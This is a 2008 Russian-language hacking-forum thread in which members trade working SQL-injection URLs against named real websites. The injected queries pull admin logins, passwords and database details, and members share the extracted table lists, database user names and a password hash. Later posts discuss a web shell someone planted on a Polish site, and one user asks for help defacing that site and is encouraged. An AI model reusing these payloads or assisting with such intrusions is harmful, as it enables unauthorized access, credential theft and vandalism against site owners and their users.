HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.08.2008, 16:23
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Цитата:
Сообщение от S00pY  
_http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,0+from+users/*


Код HTML:
Table [banners]  Table [catalog]  Table [catalog_picture]  Table [catalog_struct]  Table [catalog_text]  Table [db_pics]  Table [feature_bind]  Table [feature_group]  Table [feature_type]  Table [fotobank]  Table [invoice]  Table [link_catalog]  Table [manufactures]  Table [news]  Table [pages]  Table [pricelist]  Table [tovar]  Table [users]
Спс биг а как мне терь найти папку с бд
 
Ответить с цитированием

  #2  
Старый 10.08.2008, 16:53
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

?item=-1+union+select+1,2,concat_ws(char(58),user(),datab ase(),version()),4,5,6,7,8,9,0/*
user: u13238@10.10.223.207
database: u13238_2
version: 5.0.45-log
подбирай таблици..
 
Ответить с цитированием

  #3  
Старый 10.08.2008, 17:33
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?
 
Ответить с цитированием

  #4  
Старый 10.08.2008, 18:03
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от superboys  
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?
нет
 
Ответить с цитированием

  #5  
Старый 10.08.2008, 22:40
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а как не локальный сервер получить майсикьюла пробывал некоторые значения не прокатило*?
 
Ответить с цитированием

  #6  
Старый 10.08.2008, 22:46
Don Anton
Участник форума
Регистрация: 28.02.2008
Сообщений: 120
Провел на форуме:
1704588

Репутация: 335
По умолчанию

должно пройти, не может быть
 
Ответить с цитированием

  #7  
Старый 10.08.2008, 22:54
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

Вот он мне выдаёт
4

версия 4.1.9|используемая база db2255b| на запрос пасса 606717756665bce6|юзер us2255a@localhost

6, Хитрый Чен=))
 
Ответить с цитированием

  #8  
Старый 11.08.2008, 00:06
AARON
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733

Репутация: 46
По умолчанию

Ситуация: Откопал кем-то залитый ремвью на кажись польский сайт. получил доступ к базе. Прав на запись нету. Есть логин\пасс админа, правда чет не заходит может не туда ввожу, сайт-то польский.
Что можно сделать кроме как удалить\перезалить базу?
 
Ответить с цитированием

  #9  
Старый 11.08.2008, 01:08
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от AARON  
Что можно сделать кроме как удалить\перезалить базу?
что душе угодно )
 
Ответить с цитированием

  #10  
Старый 11.08.2008, 01:26
AARON
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733

Репутация: 46
По умолчанию

Ну тогда помоги, пожалуйста, задефейсить Или хоть направь куда копать. Поиск не помог.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ